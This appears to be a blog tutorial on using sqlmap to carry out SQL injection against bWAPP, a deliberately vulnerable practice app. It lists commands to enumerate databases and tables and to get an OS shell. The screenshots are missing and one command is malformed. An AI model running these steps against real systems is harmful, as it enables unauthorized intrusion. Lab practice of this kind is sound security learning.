How To Hack bWAPP

-

Why bWAPP? 😮


bWAPP, or a buggy web application, is a free and open source deliberately insecure web application.
It helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities.
bWAPP prepares one to conduct successful penetration testing and ethical hacking projects.

What makes bWAPP so unique? Well, it has over 100 web vulnerabilities!
It covers all major known web bugs, including all risks from the OWASP Top 10 project.

bWAPP is a PHP application that uses a MySQL database. It can be hosted on Linux/Windows with Apache/IIS and MySQL. It can also be installed with WAMP or XAMPP.
Another possibility is to download the bee-box, a custom Linux VM pre-installed with bWAPP.

You can download bWAPP using this link here bWAPP, a buggy web application! (itsecgames.com).



AIM: Perform SQL Injection Attack on Bwapp using SQLMAP and get OS shell

REQUIREMENTS:

·       OS – Windows

·       Tools – Bwapp, Sqlmap,

FOLLOW THE STEPS IN THE IMAGES BELOW:

Lets Goooo!!!

1. Getting the database of bWAPP

python .\sqlmap.py -u "webpage url + cookie" --dbs



2. Below are the list of available database in bWAPP





3. Finding out the Tables in it. Type the following command:

python .\sqlmap.py -u "webpage url+cookie" -D "database name" --tables





4. Below are the tables in the database "bwapp"



5. Finding the os shell type the same previous command:

  python .\sqlmap.py -u "webpage url+cookie" -D " --os-shell






....

CONGRATULATIONS!!!

 

You Have Hacked bWAPP💪💪💪💪


There is another blog where I have posted to configure bWAPP in your computer. Follow for more.

Thank you. 

Don't Forget to Leave a Comment



 

Comments

Post a Comment

Popular posts from this blog

DANGEROUS SEARCH ENGINES FOR IOT; Shodan, Censys and Thingful

-
Image
    What is Shodan? Shodan was created by computer scientist John Matherly as a hobby. Matherly wanted to track any type of device connected to the internet. This is how Shodan became real in 2009. Shodan indexation works by searching open ports of any service or device. This means that Shodan, unlike any normal search engine, does not focus on searching web pages but on collecting the banners of the services (server response to a request). These services include HTTP, HTTPS, FTP, SSH, Telnet, SNMP and SIP protocols. Then, the user can search for devices by regions or geographic areas applying Shodan filters.   How Does Shodan Work? Shodan works by requesting connections to every imaginable internet protocol (IP) address on the internet and indexing the information that it gets back from those connection requests. Shodan crawls the web for devices using a global network of computers and servers that are running 24/7. An IP address is your device’s digital signature — it
Read more